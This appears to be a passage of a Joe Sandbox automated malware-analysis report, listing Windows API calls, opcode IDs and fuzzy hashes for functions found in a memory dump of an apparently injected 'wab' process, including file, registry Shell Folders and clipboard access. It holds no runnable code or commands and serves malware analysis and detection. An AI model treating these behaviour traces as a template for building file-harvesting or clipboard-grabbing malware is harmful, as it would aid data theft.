                                                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                • Opcode Fuzzy Hash: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFind
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Open
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ae9121cd3f31e53c53ee8718461166e7ff51970557038cf83ea6e416d6b4654c
                                                                                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                • Opcode Fuzzy Hash: ae9121cd3f31e53c53ee8718461166e7ff51970557038cf83ea6e416d6b4654c
                                                                                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                • memcpy.MSVCRT ref: 00406942
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2565263379-0
                                                                                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2014503067-0
                                                                                                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7719DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                • API String ID: 403622227-2664311388
                                                                                                                                                • Opcode ID: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                • Opcode Fuzzy Hash: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
